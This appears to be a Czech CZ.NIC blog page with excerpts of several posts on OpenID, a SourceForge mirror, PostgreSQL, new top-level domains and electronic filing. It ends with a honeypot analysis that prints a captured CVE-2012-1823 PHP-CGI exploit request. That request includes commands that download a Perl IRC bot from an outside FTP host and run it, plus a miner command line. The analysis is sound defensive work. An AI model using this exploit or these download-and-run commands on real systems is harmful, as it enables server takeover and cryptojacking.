Po čtyřech letech vývoje byl tuto středu organizací OpenID Foundation schválen standard, který je třetí generací protokolu OpenID.

Pokud jste právě překontrolovali adresu v adresním řádku prohlížeče, pravděpodobně vás překvapil nový design našeho blogu. Ano, ten starý, se odebral do sběru použitých šablon a nahradil ho nový, s celou řadou změn. Chcete­-li, vezmu vás na malou prohlídku jeho prvky. Zkušení “webaři” se asi nedozví nic převratného, ostatním třeba trochu rozšířím obzory o to, nad čím se dá při navrhování vzhledu uvažovat.

Aneb konečně jsme nastavili zrcadlo!

Asi před rokem jsme se dozvěděli od společnosti Ignum, provozující lokální zrcadlo populárního úložiště pro open source projekty SourceForge, že v hostování tohoto zrcadla již nadále nebudou pokračovat. Navrhli jsme jim, že bychom v tomto projektu, který bezpochyby slouží lokální internetové komunitě, pokračovali u nás v rámci CZ.NIC. Po krátké debatě jsme se nakonec dohodli, že vybudujeme zrcadlo od znovu na vlastním hardware a převzali jsme od nich hlavně know-how týkající se rozjezdu celého procesu v rámci provozovatele SourceForge. Vlastní realizace nějaký čas zabrala, protože kromě nákup HW bylo nutné vyřešit celou záležitost papírově.

Ve čtvrtek 6. února se v posluchárně MFF UK na Malostranském náměstí v Praze konalo pravidelné každoroční setkání českých vývojářů a uživatelů databázového systému PostgreSQL s názvem „Prague PostgreSQL Developers Day 2014“, zkráceně P2D2. Jednalo se již o sedmý ročník konference, kterou za nezbytné podpory sponzorů pořádá Czech and Slovak PostgreSQL Users Group (CSPUG). Konference jsem se zúčastnil a rád bych Vás stručně seznámil se zde prezentovanými tématy.

Není žádným tajemstvím, vlastně právě naopak, že sdružení CZ.NIC dlouhodobě poskytuje pomoc ve sporech o doménová jména. Nemůže samozřejmě nabízet právní poradenství v konkrétních případech, ale na stránkách sdružení je k dispozici detailní návod, jak postupovat v případě sporu o doménu, vysvětlení, co znamená rozhodčí doložka a také rozpis, jaká rozhodnutí soudu může CZ.NIC vykonat a jakým způsobem.

Ačkoliv není v poslední době o projektu rozšiřování nových domén nejvyšší úrovně příliš slyšet, stále postupuje a nové domény přicházejí na svět. ICANN mohl dokonce nedávno hrdě ohlásit, že nových koncovek je již více než 100 a stále přibývají. Nebude to tedy dlouho trvat a generických domén bude více než národních. Připomínám, že počet žádostí se blížil téměr dvěma tisícovkám a bylo požádáno o přibližně 1300 různých koncovek.

Pokud se omezím pouze na latinkové domény, tak nejkratší domény mohou být trojpísmenné. V kořenové zóně je v současnosti 19 takových. V rámci této nové vlny přibyly .cab, .ceo, .kim, .onl, .red, .uno a .wed. Naopak nejdelší doména je .international a o jeden znak kratší je .construction. Své vlastní domény již získala dvě města, shodou okolností hlavní města našich německy mluvících sousedů – .berlin a .wien.

Některé z nových domén už je možné registrovat či předregistrovat, ale zatím se nikdo nepochlubil žádnými závratnými čísly. Nicméně to není překvapivé, na hodnocení je ještě příliš brzy. Osobně jsem poměrně skeptický o užitečnosti celé řady nových domén. Z první várky mě zaujala například .solar, ta by vlastně měla být v naší zemi celkem populární. Rozhodně budu zvědavý na čísla domén jako .ninja či .plumbing. Zajímavé bude pozorovat souboj domén .pics, .photo, .photos a .photography. Ale to vše se dozvíme až za pár měsíců.

Ondřej Filip

Česká správa sociálního zabezpečení (ČSSZ) plánovala, že s úderem Nového roku bude od podnikatelů přijímat jednotlivé formuláře (např. evidenční listy důchodového pojištění či přehled o příjmech OSVČ) pouze elektronicky.

První, kdo se této změně přinášející ve většině případů nutnost založení datové schránky začal bránit, byli lékaři, kteří si vymohli odklad zasílání elektronických neschopenek o dva roky, tedy až od 1. ledna 2016. Po lékařích následovali živnostníci (OSVČ), kteří dostali roční výjimku. Dlouho se však zdálo, že zaměstnavatelé této povinnosti neuniknou. Nakonec se ale těsně před začátkem nového roku ČSSZ rozhodla odložit povinnost zasílání elektronických formulářů (např. ELDP – evidenčních listů důchodového pojištění, přehledů o výši pojistného či oznámení o nástupu do zaměstnání) i pro ně.

Pro některé však radost z osvobození od povinných elektronických podání může být předčasná. Kdo povinnosti (jak se alespoň nyní zdá :) neunikne, jsou plátci DPH s obratem vyšším než 6 mil. Kč. Toto podání půjde podat jak prostřednictvím datové schránky, tak daňového portálu.

Pro ty, které již nebaví sledovat všechny změny v datových schránkách a naopak se chtějí dozvědět o něco (hodně) více, než se dočtou v diskuzích na webu, je určen Ministerstvem vnitra akreditovaný kurz „Datové schránky“, který vede přední český odborník Jiří Peterka.

Jiří Průša

Mezi honeypoty, které sdružení CZ.NIC provozuje, patří i honeypot Glastopf. Ten simuluje webovou aplikaci a zaznamenává pokusy o útoky na ni. Předminulý týden jsem na něm narazil na tento HTTP požadavek:

POST //cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F
%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E
%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63
%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65
+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69
%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+
%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30
+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Host: -h

<? system("killall -9 perl;
killall -9 php;
cd /tmp;
wget ftp://199.71.214.66/bko -O /tmp/bko;
curl -O ftp://199.71.214.66/bko -O /tmp/bko;
fetch -U ftp://199.71.214.66/bko -O /tmp/bko;
lwp-download ftp://199.71.214.66/bko -O /tmp/bko;
perl /tmp/bko;
rm -rf /mpbko*"); ?>

Když dekódujeme query string, získáme toto (zformátováno):

-d+allow_url_include=on
+-d+safe_mode=off
+-d+suhosin.simulation=on
+-d+disable_functions=""
+-d+open_basedir=none
+-d+auto_prepend_file=php://input
+-d+cgi.force_redirect=0
+-d+cgi.redirect_status_env=0
+-d+auto_prepend_file=php://input
+-n

Jedná se o zneužití zranitelnosti PHP označené CVE-2012-1823 a její nekompletní opravy CVE-2012-2311, které cílí na verze nižší než 5.4.3 nebo 5.3.13 a prostředí, kde se PHP používá v konfiguraci CGI. Ve stručnosti je problém v neošetřeném případu, kdy v query stringu chybí znak „=“ a výše uvedené parametry se předávají při spuštění PHP (jejich částečné vysvětlení je například zde). Tělo tohoto požadavku je PHP skript s voláním funkce system, která spustí zadané příkazy s oprávněním, pod kterým běží web server.

Jakmile už má útočník možnost spouštět libovolné příkazy, následuje obvyklý scénář: stáhnout a spustit připravené soubory, v tomto případě IRC klienta DDoS Perl IrcBot 1.0. Zde končí informace, které nám dal honeypot. Další postup se dá ale odhadnout, když se podíváme, jaké další soubory jsou na použitém ftp serveru: mimo jiné dva binární soubory – 32 a 64bitová verze mineru cpuminer pro virtuální měnu Litecoin a instalační skript, který zajistí jeho spouštění přes crontab. Pokud někdo netuší, co jsou minery, tak se jedná o programy, kterými lze tzv. dolovat virtuální měny pomocí výpočtu složitých matematických úloh. V samotném spuštění mineru lze přečíst i přihlašovací údaje daného uživatele:

m64 -o stratum+tcp://hk.wemineltc.com:3333 -O judge.1:x -B

Jak je patrné minimálně z tohoto dotazu na stackoverflow.com, stejnou konfiguraci používal útočník již v říjnu. Že je dolování virtuálních měn novou možností pro hackery jak zhodnotit své útoky, o tom svědčí i tato zpráva Avastu z letošního srpna. V tomto případě se jednalo pro změnu u útok na Windows a dolovaly se Bitcoiny.

Jiří Machálek